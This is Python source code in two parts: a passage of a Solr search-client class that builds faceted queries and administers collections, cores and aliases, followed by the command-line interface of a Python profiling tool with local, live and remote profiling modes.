stat_facet, props, stat_facet['min'], stat_facet['max']) gap = props['gap'] unit = re.split('\d+', gap)[1] return { 'start': '%(from)s/%(unit)s' % {'from': timeFilter['from'], 'unit': unit}, 'end': '%(to)s/%(unit)s' % {'to': timeFilter['to'], 'unit': unit}, 'gap': '%(gap)s' % props, # add a 'auto' } else: gap = timeFilter['gap'][facet['widgetType']] return { 'start': '%(from)s/%(unit)s' % {'from': timeFilter['from'], 'unit': gap['unit']}, 'end': '%(to)s/%(unit)s' % {'to': timeFilter['to'], 'unit': gap['unit']}, 'gap': '%(coeff)s%(unit)s/%(unit)s' % gap, # add a 'auto' } def _get_fq(self, collection, query): params = () timeFilter = {} if collection: timeFilter = self._get_range_borders(collection, query) if timeFilter and not timeFilter.get('time_filter_overrides'): params += (('fq', urllib.unquote(utf_quoter('%(field)s:[%(from)s TO %(to)s]' % timeFilter))),) # Merge facets queries on same fields grouped_fqs = groupby(query['fqs'], lambda x: (x['type'], x['field'])) merged_fqs = [] for key, group in grouped_fqs: field_fq = next(group) for fq in group: for f in fq['filter']: field_fq['filter'].append(f) merged_fqs.append(field_fq) for fq in merged_fqs: if fq['type'] == 'field': fields = fq['field'] if type(fq['field']) == list else [fq['field']] # 2D facets support for field in fields: f = [] for _filter in fq['filter']: values = _filter['value'] if type(_filter['value']) == list else [_filter['value']] # 2D facets support if fields.index(field) < len(values): # Lowest common field denominator value = values[fields.index(field)] exclude = '-' if _filter['exclude'] else '' if value is not None and ' ' in force_unicode(value): value = force_unicode(value).replace('"', '\\"') f.append('%s%s:"%s"' % (exclude, field, value)) else: f.append('%s{!field f=%s}%s' % (exclude, field, value)) _params ='{!tag=%(id)s}' % fq + ' '.join(f) params += (('fq', urllib.unquote(utf_quoter(_params))),) elif fq['type'] == 'range': params += (('fq', '{!tag=%(id)s}' % fq + ' '.join([urllib.unquote( utf_quoter('%s%s:[%s TO %s}' % ('-' if field['exclude'] else '', fq['field'], f['from'], f['to']))) for field, f in zip(fq['filter'], fq['properties'])])),) elif fq['type'] == 'range-up': params += (('fq', '{!tag=%(id)s}' % fq + ' '.join([urllib.unquote( utf_quoter('%s%s:[%s TO %s}' % ('-' if field['exclude'] else '', fq['field'], f['from'] if fq['is_up'] else '*', '*' if fq['is_up'] else f['from']))) for field, f in zip(fq['filter'], fq['properties'])])),) elif fq['type'] == 'map': _keys = fq.copy() _keys.update(fq['properties']) params += (('fq', '{!tag=%(id)s}' % fq + urllib.unquote( utf_quoter('%(lat)s:[%(lat_sw)s TO %(lat_ne)s} AND %(lon)s:[%(lon_sw)s TO %(lon_ne)s}' % _keys))),) return params def query(self, collection, query): solr_query = {} solr_query['collection'] = collection['name'] if query.get('download'): solr_query['rows'] = 1000 solr_query['start'] = 0 else: solr_query['rows'] = int(collection['template']['rows'] or 10) solr_query['start'] = int(query['start']) solr_query['rows'] = min(solr_query['rows'], 1000) solr_query['start'] = min(solr_query['start'], 10000) params = self._get_params() + ( ('q', self._get_q(query)), ('wt', 'json'), ('rows', solr_query['rows']), ('start', solr_query['start']), ) if any(collection['facets']): params += ( ('facet', 'true'), ('facet.mincount', 0), ('facet.limit', 10), ) json_facets = {} timeFilter = self._get_range_borders(collection, query) for facet in collection['facets']: if facet['type'] == 'query': params += (('facet.query', '%s' % facet['field']),) elif facet['type'] == 'range' or facet['type'] == 'range-up': keys = { 'id': '%(id)s' % facet, 'field': facet['field'], 'key': '%(field)s-%(id)s' % facet, 'start': facet['properties']['start'], 'end': facet['properties']['end'], 'gap': facet['properties']['gap'], 'mincount': int(facet['properties']['mincount']) } if timeFilter and timeFilter['time_field'] == facet['field'] and (facet['id'] not in timeFilter['time_filter_overrides'] or facet['widgetType'] != 'histogram-widget'): keys.update(self._get_time_filter_query(timeFilter, facet)) params += ( ('facet.range', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.range.start=%(start)s f.%(field)s.facet.range.end=%(end)s f.%(field)s.facet.range.gap=%(gap)s f.%(field)s.facet.mincount=%(mincount)s}%(field)s' % keys), ) elif facet['type'] == 'field': keys = { 'id': '%(id)s' % facet, 'field': facet['field'], 'key': '%(field)s-%(id)s' % facet, 'limit': int(facet['properties'].get('limit', 10)) + (1 if facet['widgetType'] == 'facet-widget' else 0), 'mincount': int(facet['properties']['mincount']) } params += ( ('facet.field', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.limit=%(limit)s f.%(field)s.facet.mincount=%(mincount)s}%(field)s' % keys), ) elif facet['type'] == 'nested': _f = { 'field': facet['field'], 'limit': int(facet['properties'].get('limit', 10)) + (1 if facet['widgetType'] == 'facet-widget' else 0), 'mincount': int(facet['properties']['mincount']) } if 'start' in facet['properties']: _f.update({ 'type': 'range', 'start': facet['properties']['start'], 'end': facet['properties']['end'], 'gap': facet['properties']['gap'], }) if timeFilter and timeFilter['time_field'] == facet['field'] and (facet['id'] not in timeFilter['time_filter_overrides'] or facet['widgetType'] != 'bucket-widget'): _f.update(self._get_time_filter_query(timeFilter, facet)) else: _f.update({ 'type': 'terms', 'field': facet['field'], 'excludeTags': facet['id'] }) if facet['properties']['facets']: if facet['properties']['facets'][0]['aggregate'] == 'count': _f['facet'] = { 'd2': { 'type': 'terms', 'field': '%(field)s' % facet['properties']['facets'][0], 'limit': int(facet['properties']['facets'][0].get('limit', 10)), 'mincount': int(facet['properties']['facets'][0]['mincount']) } } if len(facet['properties']['facets']) > 1: # Get 3rd dimension calculation _f['facet']['d2']['facet'] = { 'd2': self._get_aggregate_function(facet['properties']['facets'][1]) } else: _f['facet'] = { 'd2': self._get_aggregate_function(facet['properties']['facets'][0]) } json_facets[facet['id']] = _f elif facet['type'] == 'function': json_facets[facet['id']] = self._get_aggregate_function(facet) json_facets['processEmpty'] = True elif facet['type'] == 'pivot': if facet['properties']['facets'] or facet['widgetType'] == 'map-widget': fields = facet['field'] fields_limits = [] for f in facet['properties']['facets']: fields_limits.append('f.%s.facet.limit=%s' % (f['field'], f['limit'])) fields_limits.append('f.%s.facet.mincount=%s' % (f['field'], f['mincount'])) fields += ',' + f['field'] keys = { 'id': '%(id)s' % facet, 'key': '%(field)s-%(id)s' % facet, 'field': facet['field'], 'fields': fields, 'limit': int(facet['properties'].get('limit', 10)), 'mincount': int(facet['properties']['mincount']), 'fields_limits': ' '.join(fields_limits) } params += ( ('facet.pivot', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.limit=%(limit)s f.%(field)s.facet.mincount=%(mincount)s %(fields_limits)s}%(fields)s' % keys), ) if json_facets: params += ( ('json.facet', json.dumps(json_facets)), ) params += self._get_fq(collection, query) if collection['template']['fieldsSelected'] and collection['template']['isGridLayout']: fields = set(collection['template']['fieldsSelected'] + [collection['idField']] if collection['idField'] else []) # Add field if needed if collection['template']['leafletmap'].get('latitudeField'): fields.add(collection['template']['leafletmap']['latitudeField']) if collection['template']['leafletmap'].get('longitudeField'): fields.add(collection['template']['leafletmap']['longitudeField']) if collection['template']['leafletmap'].get('labelField'): fields.add(collection['template']['leafletmap']['labelField']) params += (('fl', urllib.unquote(utf_quoter(','.join(list(fields))))),) else: params += (('fl', '*'),) params += ( ('hl', 'true'), ('hl.fl', '*'), ('hl.snippets', 5), ('hl.fragsize', 1000), ) if collection['template']['fieldsSelected']: fields = [] for field in collection['template']['fieldsSelected']: attribute_field = filter(lambda attribute: field == attribute['name'], collection['template']['fieldsAttributes']) if attribute_field: if attribute_field[0]['sort']['direction']: fields.append('%s %s' % (field, attribute_field[0]['sort']['direction'])) if fields: params += ( ('sort', ','.join(fields)), ) response = self._root.get('%(collection)s/select' % solr_query, params) return self._get_json(response) def suggest(self, collection, query): try: params = self._get_params() + ( ('suggest', 'true'), ('suggest.build', 'true'), ('suggest.q', query['q']), ('wt', 'json'), ) if query.get('dictionary'): params += ( ('suggest.dictionary', query['dictionary']), ) response = self._root.get('%s/suggest' % collection, params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collections(self): # To drop, used in indexer v1 try: params = self._get_params() + ( ('detail', 'true'), ('path', '/clusterstate.json'), ) response = self._root.get('zookeeper', params=params) return json.loads(response['znode'].get('data', '{}')) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collections2(self): try: params = self._get_params() + ( ('action', 'LIST'), ('wt', 'json'), ) return self._root.get('admin/collections', params=params)['collections'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def configs(self): try: params = self._get_params() + ( ('action', 'LIST'), ('wt', 'json'), ) return self._root.get('admin/configs', params=params)['configSets'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def aliases(self): try: params = self._get_params() + ( # Waiting for SOLR-4968 ('detail', 'true'), ('path', '/aliases.json'), ) response = self._root.get('zookeeper', params=params) return json.loads(response['znode'].get('data', '{}')).get('collection', {}) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collection_or_core(self, hue_collection): if hue_collection.is_core_only: return self.core(hue_collection.name) else: return self.collection(hue_collection.name) def collection(self, name): try: collections = self.collections() return collections[name] except Exception, e: raise PopupException(e, title=_('Error while accessing Solr')) def create_collection(self, name, shards=1, replication=1): try: params = self._get_params() + ( ('action', 'CREATE'), ('name', name), ('numShards', shards), ('replicationFactor', replication), ('collection.configName', name), ('wt', 'json') ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not create collection. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def create_core(self, name, instance_dir, shards=1, replication=1): try: params = self._get_params() + ( ('action', 'CREATE'), ('name', name), ('instanceDir', instance_dir), ('wt', 'json'), ) response = self._root.post('admin/cores', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) == 0: return True else: LOG.error("Could not create core. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: if 'already exists' in e.message: LOG.warn("Could not create collection.", exc_info=True) return False else: raise PopupException(e, title=_('Error while accessing Solr')) def create_or_modify_alias(self, name, collections): try: params = self._get_params() + ( ('action', 'CREATEALIAS'), ('name', name), ('collections', ','.join(collections)), ('wt', 'json'), ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) != 0: msg = _("Could not create or edit alias. Check response:\n%s") % json.dumps(response, indent=2) LOG.error(msg) raise PopupException(msg) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def delete_alias(self, name): try: params = self._get_params() + ( ('action', 'DELETEALIAS'), ('name', name), ('wt', 'json'), ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) != 0: msg = _("Could not delete alias. Check response:\n%s") % json.dumps(response, indent=2) LOG.error(msg) raise PopupException(msg) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def remove_collection(self, name, replication=1): try: params = self._get_params() + ( ('action', 'DELETE'), ('name', name), ('replicationFactor', replication), ('wt', 'json') ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not remove collection. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def remove_core(self, name): try: params = self._get_params() + ( ('action', 'UNLOAD'), ('name', name), ('deleteIndex', 'true'), ('wt', 'json') ) response = self._root.post('admin/cores', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not remove core. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def add_fields(self, collection, fields): try: params = self._get_params() return self._root.post('%s/schema/fields' % collection, params=params, data=json.dumps(fields), contenttype='application/json') except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def cores(self): try: params = self._get_params() + ( ('wt', 'json'), ) return self._root.get('admin/cores', params=params)['status'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def core(self, core): try: params = self._get_params() + ( ('wt', 'json'), ('core', core), ) return self._root.get('admin/cores', params=params) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def schema(self, core): try: params = self._get_params() + ( ('wt', 'json'), ('file', 'schema.xml'), ) return self._root.get('%(core)s/admin/file' % {'core': core}, params=params) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def fields(self, core, dynamic=False): try: params = self._get_params() + ( ('wt', 'json'), ('fl', '*'), ) if not dynamic: params += (('show', 'schema'),) response = self._root.get('%(core)s/admin/luke' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def luke(self, core): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%(core)s/admin/luke' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def schema_fields(self, core): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%(core)s/schema/fields' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def stats(self, core, fields, query=None, facet=''): try: params = self._get_params() + ( ('q', self._get_q(query) if query is not None else EMPTY_QUERY.get()), ('wt', 'json'), ('rows', 0), ('stats', 'true'), ) if query is not None: params += self._get_fq(None, query) if facet: params += (('stats.facet', facet),) params += tuple([('stats.field', field) for field in fields]) response = self._root.get('%(core)s/select' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def terms(self, core, field, properties=None): try: params = self._get_params() + ( ('wt', 'json'), ('rows', 0), ('terms.fl', field), ) if properties: for key, val in properties.iteritems(): params += ((key, val),) response = self._root.get('%(core)s/terms' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def sql(self, collection, statement): try: if 'limit' not in statement.lower(): # rows is not supported statement = statement + ' LIMIT 100' params = self._get_params() + ( ('wt', 'json'), ('rows', 0), ('stmt', statement), ('rows', 100), ('start', 0), ) response = self._root.get('%(collection)s/sql' % {'collection': collection}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def get(self, core, doc_id): try: params = self._get_params() + ( ('id', doc_id), ('wt', 'json'), ) response = self._root.get('%(core)s/get' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) @classmethod def _get_json(cls, response): if type(response) != dict: # Got 'plain/text' mimetype instead of 'application/json' try: response = json.loads(response) except ValueError, e: # Got some null bytes in the response LOG.error('%s: %s' % (unicode(e), repr(response))) response = json.loads(response.replace('\x00', '')) return response def uniquekey(self, collection): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%s/schema/uniquekey' % collection, params=params) return self._get_json(response)['uniqueKey'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def update(self, collection_or_core_name, data, content_type='csv', version=None): try: if content_type == 'csv': content_type = 'application/csv' elif content_type == 'json': content_type = 'application/json' else: LOG.error("Could not update index for %s. Unsupported content type %s. Allowed content types: csv" % (collection_or_core_name, content_type)) return False params = self._get_params() + ( ('wt', 'json'), ('overwrite', 'true'), ) if version is not None: params += ( ('_version_', version), ('versions', 'true') ) self._root.post('%s/update' % collection_or_core_name, contenttype=content_type, params=params, data=data) return True except RestException, e: raise PopupException(e, title=_('Error while accessing Solr'))
# -*- coding: utf-8 -*- """ profiling.__main__ ~~~~~~~~~~~~~~~~~~ The command-line interface to profile a script or view profiling results. .. sourcecode:: console $ profiling --help :copyright: (c) 2014-2017, What! Studio :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from datetime import datetime from functools import partial, wraps import importlib import os try: import cPickle as pickle except ImportError: import pickle import runpy import signal import socket from stat import S_ISREG, S_ISSOCK import sys import threading import time import traceback import click from click_default_group import DefaultGroup from six import exec_ from six.moves import builtins from six.moves.configparser import ConfigParser, NoOptionError, NoSectionError from profiling import remote, sampling, tracing from profiling.__about__ import __version__ from profiling.profiler import Profiler from profiling.remote.background import BackgroundProfiler from profiling.remote.client import FailoverProfilingClient, ProfilingClient from profiling.remote.select import SelectProfilingServer from profiling.sampling import samplers, SamplingProfiler from profiling.tracing import timers, TracingProfiler from profiling.viewer import bind_game_keys, bind_vim_keys, StatisticsViewer __all__ = ['cli', 'profile', 'view'] DEFAULT_ENDPOINT = '127.0.0.1:8912' class ProfilingCLI(DefaultGroup): def __init__(self, *args, **kwargs): super(ProfilingCLI, self).__init__(*args, **kwargs) self.command_name_aliases = {} def command(self, *args, **kwargs): """Usage:: @cli.command(aliases=['ci']) def commit(): ... """ aliases = kwargs.pop('aliases', None) decorator = super(ProfilingCLI, self).command(*args, **kwargs) if aliases is None: return decorator def _decorator(f): cmd = decorator(f) for alias in aliases: self.command_name_aliases[alias] = cmd.name return cmd return _decorator def get_command(self, ctx, cmd_name): # Resolve alias. try: cmd_name = self.command_name_aliases[cmd_name] except KeyError: pass return super(ProfilingCLI, self).get_command(ctx, cmd_name) @click.command('profiling', cls=ProfilingCLI, default='profile') @click.version_option(__version__) def cli(): sys.path.insert(0, os.curdir) bind_vim_keys() bind_game_keys() class read_config(object): """Reads a config once in a Click context.""" filenames = ['setup.cfg', '.profiling'] ctx_and_config = (None, None) def __new__(cls): ctx, config = cls.ctx_and_config current_ctx = click.get_current_context(silent=True) if current_ctx != ctx: config = ConfigParser() config.read(cls.filenames) cls.ctx_and_config = (current_ctx, config) return config def option_getter(type): """Gets an unbound method to get a configuration option as the given type. """ option_getters = {None: ConfigParser.get, int: ConfigParser.getint, float: ConfigParser.getfloat, bool: ConfigParser.getboolean} return option_getters.get(type, option_getters[None]) def config_default(option, default=None, type=None, section=cli.name): """Guesses a default value of a CLI option from the configuration. :: @click.option('--locale', default=config_default('locale')) """ def f(option=option, default=default, type=type, section=section): config = read_config() if type is None and default is not None: # detect type from default. type = builtins.type(default) get_option = option_getter(type) try: return get_option(config, section, option) except (NoOptionError, NoSectionError): return default return f def config_flag(option, value, default=False, section=cli.name): """Guesses whether a CLI flag should be turned on or off from the configuration. If the configuration option value is same with the given value, it returns ``True``. :: @click.option('--ko-kr', 'locale', is_flag=True, default=config_flag('locale', 'ko_KR')) """ class x(object): def __bool__(self, option=option, value=value, default=default, section=section): config = read_config() type = builtins.type(value) get_option = option_getter(type) try: return get_option(config, section, option) == value except (NoOptionError, NoSectionError): return default __nonzero__ = __bool__ return x() def get_title(src_name, src_type=None): """Normalizes a source name as a string to be used for viewer's title.""" if src_type == 'tcp': return '{0}:{1}'.format(*src_name) return os.path.basename(src_name) def make_viewer(mono=False, *loop_args, **loop_kwargs): """Makes a :class:`profiling.viewer.StatisticsViewer` with common options. """ viewer = StatisticsViewer() loop = viewer.loop(*loop_args, **loop_kwargs) if mono: loop.screen.set_terminal_properties(1) return (viewer, loop) def spawn_thread(func, *args, **kwargs): """Spawns a daemon thread.""" thread = threading.Thread(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def spawn(mode, func, *args, **kwargs): """Spawns a thread-like object which runs the given function concurrently. Available modes: - `threading` - `greenlet` - `eventlet` """ if mode is None: # 'threading' is the default mode. mode = 'threading' elif mode not in spawn.modes: # validate the given mode. raise ValueError('Invalid spawn mode: %s' % mode) if mode == 'threading': return spawn_thread(func, *args, **kwargs) elif mode == 'gevent': import gevent import gevent.monkey gevent.monkey.patch_select() gevent.monkey.patch_socket() return gevent.spawn(func, *args, **kwargs) elif mode == 'eventlet': import eventlet eventlet.patcher.monkey_patch(select=True, socket=True) return eventlet.spawn(func, *args, **kwargs) assert False spawn.modes = ['threading', 'gevent', 'eventlet'] #: Just returns the first argument. noop = lambda x: x def import_(module_name, name): """Imports an object by a relative module path:: Profiler = import_('profiling.profiler', 'Profiler') """ module = importlib.import_module(module_name, __package__) return getattr(module, name) #: Makes a function which import an object by :func:`import_` lazily. importer = lambda module_name, name: partial(import_, module_name, name) # custom parameter types class Class(click.ParamType): def __init__(self, modules, base, base_name=None, postfix=True): self.modules = modules self.base = base self.base_name = base_name self.postfix = postfix def convert(self, value, param, ctx): if value == self.base_name: return self.base name = value.title() if self.postfix: name += self.base.__name__.title() for mod in self.modules: try: cls = getattr(mod, name) except AttributeError: continue if not isinstance(cls, type): continue elif not issubclass(cls, self.base): continue return cls self.fail('%s not found' % name) def get_metavar(self, param): return self.base.__name__.upper() class Script(click.File): """A parameter type for Python script.""" def __init__(self): super(Script, self).__init__('rb') def convert(self, value, param, ctx): with super(Script, self).convert(value, param, ctx) as f: filename = f.name code = compile(f.read(), filename, 'exec') globals_ = {'__file__': filename, '__name__': '__main__', '__package__': None, '__doc__': None} return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON' class Module(click.ParamType): def convert(self, value, param, ctx): # inspired by @htch's fork. # https://github.com/htch/profiling/commit/4a4eb6e try: detail = runpy._get_module_details(value) except ImportError as exc: ctx.fail(str(exc)) try: # since Python 3.4. mod_name, mod_spec, code = detail except ValueError: mod_name, loader, code, filename = detail else: loader = mod_spec.loader filename = mod_spec.origin # follow runpy's behavior. pkg_name = mod_name.rpartition('.')[0] globals_ = sys.modules['__main__'].__dict__.copy() globals_.update(__name__='__main__', __file__=filename, __loader__=loader, __package__=pkg_name) return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON-MODULE' class Command(click.ParamType): def convert(self, value, param, ctx): filename = '<string>' code = compile(value, filename, 'exec') globals_ = {'__name__': '__main__', '__package__': None, '__doc__': None} return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON-COMMAND' class Endpoint(click.ParamType): """A parameter type for IP endpoint.""" def convert(self, value, param, ctx): host, port = value.split(':') port = int(port) return (host, port) def get_metavar(self, param): return 'HOST:PORT' class ViewerSource(click.ParamType): """A parameter type for :class:`profiling.viewer.StatisticsViewer` source. """ def convert(self, value, param, ctx): src_type = False try: mode = os.stat(value).st_mode except OSError: try: src_name = Endpoint().convert(value, param, ctx) except ValueError: pass else: src_type = 'tcp' else: src_name = value if S_ISSOCK(mode): src_type = 'sock' elif S_ISREG(mode): src_type = 'dump' if not src_type: raise ValueError('Dump file or socket address required.') return (src_type, src_name) def get_metavar(self, param): return 'SOURCE' class SignalNumber(click.ParamType): """A parameter type for signal number.""" @staticmethod def name_of(signum): for name, value in signal.__dict__.items(): if signum == value: if name.startswith('SIG') and not name.startswith('SIG_'): return name return str(signum) def convert(self, value, param, ctx): if isinstance(value, int): return value elif value.isdigit(): return int(value) signame = value.upper() if not signame.startswith('SIG'): signame = 'SIG' + signame if signame.startswith('SIG_'): self.fail('Invalid signal %s' % signame) try: signum = getattr(signal, signame) except AttributeError: self.fail('Unknown signal %s' % signame) return signum def get_metavar(self, param): return 'SIGNUM' # common parameters class Params(object): def __init__(self, params): self.params = params def __call__(self, f): for param in self.params[::-1]: f = param(f) return f def __add__(self, params): return self.__class__(self.params + params) def profiler_options(f): # tracing profiler options @click.option( '-T', '--tracing', 'import_profiler_class', flag_value=importer('profiling.tracing', 'TracingProfiler'), default=config_flag('profiler', 'tracing', True), help='Use tracing profiler. (default)') @click.option( '--timer', 'timer_class', type=Class([timers], timers.Timer, 'basic'), default=config_default('timer', 'basic'), help='Choose CPU timer for tracing profiler. (basic|thread|greenlet)') # sampling profiler options @click.option( '-S', '--sampling', 'import_profiler_class', flag_value=importer('profiling.sampling', 'SamplingProfiler'), default=config_flag('profiler', 'sampling', False), help='Use sampling profiler.') @click.option( '--sampler', 'sampler_class', type=Class([samplers], samplers.Sampler), default=config_default('sampler', 'itimer'), help='Choose frames sampler for sampling profiler. (itimer|tracing)') @click.option( '--sampling-interval', type=float, default=config_default('sampling-interval', samplers.INTERVAL), help='How often sample. (default: %.3f cpu sec)' % samplers.INTERVAL) # etc @click.option( '--pickle-protocol', type=int, default=config_default('pickle-protocol', remote.PICKLE_PROTOCOL), help='Pickle protocol to dump result.') @wraps(f) def wrapped(import_profiler_class, timer_class, sampler_class, sampling_interval, **kwargs): profiler_class = import_profiler_class() assert issubclass(profiler_class, Profiler) if issubclass(profiler_class, TracingProfiler): # profiler requires timer. timer_class = timer_class or tracing.TIMER_CLASS timer = timer_class() profiler_kwargs = {'timer': timer} elif issubclass(profiler_class, SamplingProfiler): sampler_class = sampler_class or sampling.SAMPLER_CLASS sampler = sampler_class(sampling_interval) profiler_kwargs = {'sampler': sampler} else: profiler_kwargs = {} profiler_factory = partial(profiler_class, **profiler_kwargs) return f(profiler_factory=profiler_factory, **kwargs) return wrapped def profiler_arguments(f): @click.argument('argv', nargs=-1) @click.option('-m', 'module', type=Module(), help='Run library module as a script.') @click.option('-c', 'command', type=Command(), help='Program passed in as string.') @wraps(f) def wrapped(argv, module, command, **kwargs): if module is not None and command is not None: raise click.UsageError('Option -m and -c are exclusive') script = module or command if script is None: # -m and -c not passed. try: script_filename, argv = argv[0], argv[1:] except IndexError: raise click.UsageError('Script not specified') script = Script().convert(script_filename, None, None) kwargs.update(script=script, argv=argv) return f(**kwargs) return wrapped viewer_options = Params([ click.option('--mono', is_flag=True, help='Disable coloring.'), ]) onetime_profiler_options = Params([ click.option( '-d', '--dump', 'dump_filename', type=click.Path(writable=True), help='Profiling result dump filename.'), ]) live_profiler_options = Params([ click.option( '-i', '--interval', type=float, default=config_default('interval', remote.INTERVAL), help='How often update result. (default: %.0f sec)' % remote.INTERVAL), click.option( '--spawn', type=click.Choice(spawn.modes), default=config_default('spawn'), callback=lambda c, p, v: partial(spawn, v), help='How to spawn profiler server in background.'), click.option( '--signum', type=SignalNumber(), default=config_default('signum', BackgroundProfiler.signum), help=( 'For communication between server and application. (default: %s)' % SignalNumber.name_of(BackgroundProfiler.signum) )) ]) # sub-commands def __profile__(filename, code, globals_, profiler_factory, pickle_protocol=remote.PICKLE_PROTOCOL, dump_filename=None, mono=False): frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler.start() try: exec_(code, globals_) except BaseException: # don't profile print_exc(). profiler.stop() traceback.print_exc() else: profiler.stop() # discard this __profile__ function from the result. profiler.stats.discard_child(frame.f_code) if dump_filename is None: try: profiler.run_viewer(get_title(filename), mono=mono) except KeyboardInterrupt: pass else: profiler.dump(dump_filename, pickle_protocol) click.echo('To view statistics:') click.echo(' $ profiling view ', nl=False) click.secho(dump_filename, underline=True) class ProfilingCommand(click.Command): def collect_usage_pieces(self, ctx): """Prepend "[--]" before "[ARGV]...".""" pieces = super(ProfilingCommand, self).collect_usage_pieces(ctx) assert pieces[-1] == '[ARGV]...' pieces.insert(-1, 'SCRIPT') pieces.insert(-1, '[--]') return pieces @cli.command(cls=ProfilingCommand) @profiler_arguments @profiler_options @onetime_profiler_options @viewer_options def profile(script, argv, profiler_factory, pickle_protocol, dump_filename, mono): """Profile a Python script.""" filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) __profile__(filename, code, globals_, profiler_factory, pickle_protocol=pickle_protocol, dump_filename=dump_filename, mono=mono) @cli.command('live-profile', aliases=['live'], cls=ProfilingCommand) @profiler_arguments @profiler_options @live_profiler_options @viewer_options def live_profile(script, argv, profiler_factory, interval, spawn, signum, pickle_protocol, mono): """Profile a Python script continuously.""" filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) parent_sock, child_sock = socket.socketpair() stderr_r_fd, stderr_w_fd = os.pipe() pid = os.fork() if pid: # parent os.close(stderr_w_fd) viewer, loop = make_viewer(mono) # loop.screen._term_output_file = open(os.devnull, 'w') title = get_title(filename) client = ProfilingClient(viewer, loop.event_loop, parent_sock, title) client.start() try: loop.run() except KeyboardInterrupt: os.kill(pid, signal.SIGINT) except BaseException: # unexpected profiler error. os.kill(pid, signal.SIGTERM) raise finally: parent_sock.close() # get exit code of child. w_pid, status = os.waitpid(pid, os.WNOHANG) if w_pid == 0: os.kill(pid, signal.SIGTERM) exit_code = os.WEXITSTATUS(status) # print stderr of child. with os.fdopen(stderr_r_fd, 'r') as f: child_stderr = f.read() if child_stderr: sys.stdout.flush() sys.stderr.write(child_stderr) # exit with exit code of child. sys.exit(exit_code) else: # child os.close(stderr_r_fd) # mute stdin, stdout. devnull = os.open(os.devnull, os.O_RDWR) for f in [sys.stdin, sys.stdout]: os.dup2(devnull, f.fileno()) # redirect stderr to parent. os.dup2(stderr_w_fd, sys.stderr.fileno()) frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler_trigger = BackgroundProfiler(profiler, signum) profiler_trigger.prepare() server_args = (interval, noop, pickle_protocol) server = SelectProfilingServer(None, profiler_trigger, *server_args) server.clients.add(child_sock) spawn(server.connected, child_sock) try: exec_(code, globals_) finally: os.close(stderr_w_fd) child_sock.shutdown(socket.SHUT_WR) @cli.command('remote-profile', aliases=['remote'], cls=ProfilingCommand) @profiler_arguments @profiler_options @live_profiler_options @click.option('-b', '--bind', 'endpoint', type=Endpoint(), default=config_default('endpoint', DEFAULT_ENDPOINT), help='IP endpoint to serve profiling results.') @click.option('-v', '--verbose', is_flag=True, help='Print profiling server logs.') def remote_profile(script, argv, profiler_factory, interval, spawn, signum, pickle_protocol, endpoint, verbose): """Launch a server to profile continuously. The default endpoint is 127.0.0.1:8912. """ filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) # create listener. listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listener.bind(endpoint) listener.listen(1) # be verbose or quiet. if verbose: log = lambda x: click.echo(click.style('> ', fg='cyan') + x) bound_addr = listener.getsockname() log('Listening on {0}:{1} for profiling...'.format(*bound_addr)) else: log = noop # start profiling server. frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler_trigger = BackgroundProfiler(profiler, signum) profiler_trigger.prepare() server_args = (interval, log, pickle_protocol) server = SelectProfilingServer(listener, profiler_trigger, *server_args) spawn(server.serve_forever) # exec the script. try: exec_(code, globals_) except KeyboardInterrupt: pass 